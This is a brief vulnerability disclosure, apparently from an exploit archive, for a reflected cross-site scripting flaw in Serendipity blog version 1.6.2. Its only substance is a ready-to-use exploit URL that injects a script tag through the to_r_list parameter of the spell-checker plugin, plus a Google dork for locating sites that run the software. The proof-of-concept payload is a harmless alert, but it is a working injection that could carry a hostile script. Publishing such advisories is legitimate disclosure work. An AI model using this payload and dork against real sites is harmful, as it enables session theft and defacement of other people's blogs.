##################################################
# Description : Serendipity XSS Vulnerability
# Version : 1.6.2
# link : http://www.s9y.org/
# Software : http://downloads.sourceforge.net/project/php-blog/serendipity/1.6.2/serendipity-1.6.2.tar.gz
# Date : 06-07-2012
# Google Dork : intext:"Powered by Serendipity"
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

http://localhost/serendipity/htmlarea/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert%28123%29%3C/script%3E

Intégrateur de solutions open source et de logiciels libres en entreprise.